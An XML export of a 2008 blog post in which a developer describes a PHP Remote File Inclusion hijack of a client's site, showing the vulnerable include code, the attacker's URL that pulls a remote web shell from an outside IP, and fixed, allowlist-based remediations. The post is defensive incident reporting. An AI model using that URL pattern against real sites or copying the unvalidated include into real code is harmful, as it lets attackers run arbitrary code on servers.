<?xml version="1.0" encoding="UTF-8"?>
<entries type="array">
  <entry>
    <body>&lt;img src="http://joncrawford.com/system/images/php.gif" class="photoleft" style="background:0;" /&gt; A panicked client of mine contacted me today with concerns about his website.  Every few times we would load his company's homepage, it would show an incorrect website.  This site had links to p0rn and other subject matter that a fine business would deem unfit to put on the front page of its website.  &lt;a href="http://skitch.com/newmonarch/j254/not-the-correct-website" target="_blank"&gt;See the page that was being maliciously loaded here&lt;/a&gt;. So I got to work hunting down the source of the hijack.  
=more=
With some help from the gurus at "HostGator":http://hostgator.com support, I finally found out how this was happening.  The answer: an RFI ("Remote File Inclusion") attack.  

We build most of our small websites in PHP.  These days I pass all of my PHP work off to my code monkeys.  The benefits and sanity that come from Ruby on Rails make it almost impossible for me to even look at PHP without feeling dizzy.  The developer for this site unwittingly used a small piece of vulnerable code that basically allowed any hacker to make the website his own personal playground.  

h3. Vulnerable Code

&lt;notextile&gt;
&lt;pre lang="php"&gt;
&lt;?php
// Example URLs: http://bellchem.com/products.php?page=tech
//               http://bellchem.com/products.php?page=nutrition
$page = $_GET['page'];   // taken straight from the query string, unvalidated
include $page . ".php";  // PHP resolves and executes whatever path this builds
&lt;/pre&gt;
&lt;/notextile&gt;

What a lot of PHP developers don't know is that the &lt;code&gt;include()&lt;/code&gt; function will actually accept a remote file as well as a local one.  So one could write &lt;code&gt;include('http://apple.com');&lt;/code&gt;, for instance, and insert the content of Apple's website into the body of their own site.  And to take it one step further, the function doesn't just include remote content: it also *EXECUTES* the included code.

This means that with a hole like this in your code, a hacker could write any PHP script they wanted to and then just include it in your URL and *_your web server will run it!_*  And that's exactly what our hacker did.

h3. Malicious URL Used By Hacker

&lt;pre&gt;http://website.com/products.php?page=http://141.84.238.34/.../cmd?&lt;/pre&gt;


Upon including "http://141.84.238.34/.../cmd?" at the end of the URL, it loaded a simple yet impressive file management panel right in the middle of my beautiful website. &lt;a href="http://skitch.com/newmonarch/j255/malicious-upload-form-exploit" target="_blank"&gt;Take a look&lt;/a&gt;.  It's really quite impressive.  As you can see, from here the attacker can completely manipulate the entire filesystem and even execute shell commands on the server.  This attacker used the opportunity to redirect visitors to a site whose advertising revenue he or she presumably had a stake in.  

Well, the password has been changed and the vulnerability has been closed.  I'm sure there is more than one way to secure this hole, but here is how I did it.

h3. Cleaned Up Version &lt;span class="quiet small"&gt;Won't execute remote code&lt;/span&gt;

&lt;notextile&gt;
&lt;pre lang="php"&gt;
&lt;?php
$page = $_GET['page'];
// Only include the file if it exists on the local filesystem. file_exists()
// does not speak http://, so a remote URL fails this check and is never fetched.
if (file_exists("./$page.php")) {
    include $page . ".php";
} else {
    echo "There has been a problem.";
}
&lt;/pre&gt;
&lt;/notextile&gt;
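As an added example (my own code, not the post's), a stricter version of the same include logic: it accepts only names from a fixed allowlist and confirms the resolved path stays inside the pages directory, so the file_exists() check above is no longer the only thing standing between a "../" value and some other local .php file.  It assumes the page files live in a pages/ subdirectory and that tech and nutrition are the only pages.

```php
&lt;?php
// Added example, not the original site's code. Assumes ./pages/tech.php and
// ./pages/nutrition.php exist (the two pages named in the post).

// Allowlist of page names that may be included. Anything else is rejected
// before it reaches include(), so neither http:// URLs nor ../ paths can be
// supplied through ?page=.
$allowed_pages = array('tech', 'nutrition');

function resolve_page_file($page, array $allowed, $base_dir)
{
    // Reject anything that is not a plain page name (letters, digits, _ or -).
    if (!is_string($page) || !preg_match('/\A[a-z0-9_-]+\z/', $page)) {
        return null;
    }
    // Strict comparison: no type juggling surprises from in_array().
    if (!in_array($page, $allowed, true)) {
        return null;
    }
    $base = realpath($base_dir);
    $file = realpath($base_dir . DIRECTORY_SEPARATOR . $page . '.php');
    // realpath() returns false for a missing file; also confirm the resolved
    // path is still underneath the pages directory (defence in depth).
    if ($base === false || $file === false) {
        return null;
    }
    if (strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

$page = isset($_GET['page']) ? $_GET['page'] : 'tech';
$file = resolve_page_file($page, $allowed_pages, __DIR__ . '/pages');

if ($file === null) {
    http_response_code(404);
    echo "There has been a problem.";
} else {
    include $file;
}
```

Independently of the code, setting allow_url_include=Off in php.ini stops include() from fetching http:// paths at all, which closes the remote case server-wide even if another script forgets to validate its input.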

&lt;span class="small quiet"&gt;The full dish: "RFI Attack on Wikipedia":http://en.wikipedia.org/wiki/Remote_File_Inclusion&lt;/span&gt;</body>
    <comments-count type="integer">0</comments-count>
    <comments-open type="boolean">false</comments-open>
    <created-at type="datetime">2008-04-17T22:20:13-07:00</created-at>
    <entry-class>article</entry-class>
    <feature type="boolean">false</feature>
    <id type="integer">6</id>
    <noborder type="boolean">false</noborder>
    <permalink>nasty-php-exploit-rears-its-ugly-head-rfi-attack</permalink>
    <published type="boolean">true</published>
    <published-at type="datetime">2008-04-17T23:50:29-07:00</published-at>
    <title>Nasty PHP Exploit Rears Its Ugly Head (RFI Attack)</title>
    <updated-at type="datetime">2009-12-15T11:38:51-08:00</updated-at>
    <user-id type="integer" nil="true"></user-id>
  </entry>
</entries>
